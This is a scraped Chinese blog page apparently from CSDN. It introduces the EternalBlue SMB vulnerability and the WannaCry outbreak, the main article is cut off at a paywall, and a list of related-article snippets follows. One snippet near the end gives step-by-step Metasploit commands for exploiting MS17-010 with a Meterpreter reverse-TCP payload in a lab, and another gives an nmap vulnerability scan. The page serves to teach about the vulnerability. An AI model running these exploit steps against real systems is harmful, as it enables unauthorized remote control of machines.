可刑又可拷!永恒之蓝漏洞原理及复现

最新推荐文章于 2025-03-30 15:36:21 发布
最新推荐文章于 2025-03-30 15:36:21 发布
阅读量5.6k 收藏 14
点赞数 1
文章标签: web安全 网络安全 安全架构 安全威胁分析 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hack0919/article/details/130351224
版权

 

一.永恒之蓝介绍

1.什么是永恒之蓝

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。

2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.SMB协议介绍。

SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API),一般端口使用为139,445。

3.SMB会话生命阶段。

1) SMB协议协商(Negotiate)

在一个SMB还没有开始的时候,由客户端率先发出一个协商请求。在请求中,客户端会列出所有它所支持协议版本以及所

最低0.47元/天 解锁文章
白袍万里
关注
网络攻防——永恒之蓝
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
永恒之蓝漏洞原理及利用
热门推荐
qq_41679358的博客
08-16 2万+
本文转自行云博客https://www.xy586.top/ 文章目录摘要前提需要原理漏洞利用 摘要 什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通.
永恒之蓝漏洞解析
xhx836161547的博客
02-08 2533
永恒之蓝实验报告
Windows系统下的漏洞攻击——永恒之蓝
最新发布
m0_73636084的博客
03-30 707
永恒之蓝漏洞攻击
漏洞考古之永恒之蓝原理及利用
lopowh的博客
03-11 1212
什么是永恒之蓝漏洞永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。2.什么是SMB协议?
微软EternalBlue永恒之蓝漏洞攻击测试
我的学习笔记
02-28 5013
声明:仅供学习交流使用,个人实验笔记。排版比较懒。微软MS17-010理论:SMBv1 漏洞攻击,445端口。环境准备:攻击资源:攻击工具包 点我攻击者系统:Windows 7 Ultimate (x64) 点我受害者系统:Windows 7 Ultimate (x64) 点我,winXP,win2008,win2003均可。 点我辅助攻击用系统:kal...
Windows 2008永恒之蓝漏洞利用与后渗透测试详解
09-23
具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞(MS17-010 EternalBlue)取得目标主机管理访问,最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验
2401_84297796的博客
05-03 1631
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
Kali--永恒之蓝漏洞复现
f1245179815的博客
10-24 1100
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
2401_84297796的博客
05-03 1033
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
EternalBlue漏洞利用
aptx4869_li的博客
01-18 524
请到我的博客中去看吧 https://jd1412.github.io/2019/01/15/EternalBlue漏洞利用/
永恒之蓝扫描工具ui版
11-15
图形化的永恒之蓝 扫描工具,发现wannacry smb漏洞就, 安全工具
【网络病毒】永恒之蓝漏洞原理复现
A1_3_9_7的博客
01-04 2508
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝漏洞复现
m0_74763043的博客
12-02 733
永恒之蓝 ms17_010漏洞
永恒之蓝漏洞原理 445_不死的EternalBlue(永恒之蓝
weixin_39610724的博客
12-04 1283
2017年,Shadow Brokers将从美国国家安全局NSA窃取的软件漏洞利用攻击泄露在网上,之后1个月知名勒索软件WannaCry就席卷全球。现在已经过去2年了,Eternalblue仍然占据着美国的头版头条。本文就Eternalblue和Eternalblue为什么可以不死进行简要分析。 EternalblueCVE-2017-0143到CVE-2017-0148漏洞是Windo...
永恒之蓝 (EternalBlue) 漏洞利用原理详解
volta_xu的博客
06-02 2282
SMB(Server Message Block)协议是一种网络文件共享协议,主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中,SMB协议是默认启用的,用于提供文件共享服务。
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 8346
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
永恒之蓝实现和讲解
2402_86725606的博客
01-08 1337
永恒之蓝作为一个历史性网络漏洞,揭示了SMB协议中的重大安全隐患。攻击者利用其漏洞能够轻松实现远程攻击和传播恶意软件,但通过及时更新补丁和实施网络防护措施。以下从背景、技术原理、实现过程和防护措施四个方面详细解析永恒之蓝及其实现。nmap -p445 --script smb-vuln* <目标IP>使用Nmap或其他工具扫描目标网络,找到打开的445端口。以下是永恒之蓝漏洞利用的技术细节和实现过程。再次永恒之蓝的事件提醒我们,
永恒之蓝漏洞原理漏洞复现
m0_66908617的博客
02-10 3249
摘要永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,、整个以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。上文提到了SMB协议。
永恒之蓝漏洞复现ubuntu
12-06
永恒之蓝(EternalBlue)是一个严重的安全漏洞,最初由美国国家安全局(NSA)发现,后来被黑客组织Shadow Brokers泄露。永恒之蓝利用了Windows SMB服务中的一个漏洞,允许攻击者远程执行代码。为了复现永恒之蓝漏洞在Ubuntu系统上的影响,通常需要设置一个实验环境。以下是复现永恒之蓝漏洞的基本步骤: ### 环境准备 1. **安装虚拟机**:使用VirtualBox或VMware安装两台虚拟机,一台运行Ubuntu,另一台运行Windows(建议使用Windows 7或Windows Server 2008,因为这些版本更容易受到永恒之蓝攻击)。 2. **网络配置**:确保两台虚拟机在同一局域网内,可以互相通信。 ### 步骤 1. **安装必要的软件**: - 在Ubuntu上安装Metasploit框架: ```bash sudo apt update sudo apt install metasploit-framework ``` - 在Windows虚拟机上禁用防火墙和防病毒软件,以确保攻击能够成功。 2. **启动Metasploit**: ```bash msfconsole ``` 3. **搜索永恒之蓝模块**: ```bash search eternalblue ``` 4. **使用永恒之蓝模块**: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` 5. **设置目标IP和本地IP**: ```bash set RHOST <Windows虚拟机IP> set LHOST <Ubuntu虚拟机IP> ``` 6. **选择Payload**: ```bash set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 7. **执行攻击**: ```bash exploit ``` ### 结果 如果攻击成功,你将获得一个Meterpreter会话,可以远程执行命令和控制目标Windows系统。 ### 注意事项 - **法律和道德**:复现漏洞仅用于学习和研究目的,禁止在未经授权的系统上使用。 - **安全性**:在实际环境中,确保系统已安装最新的安全补丁,以防止此类漏洞被利用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值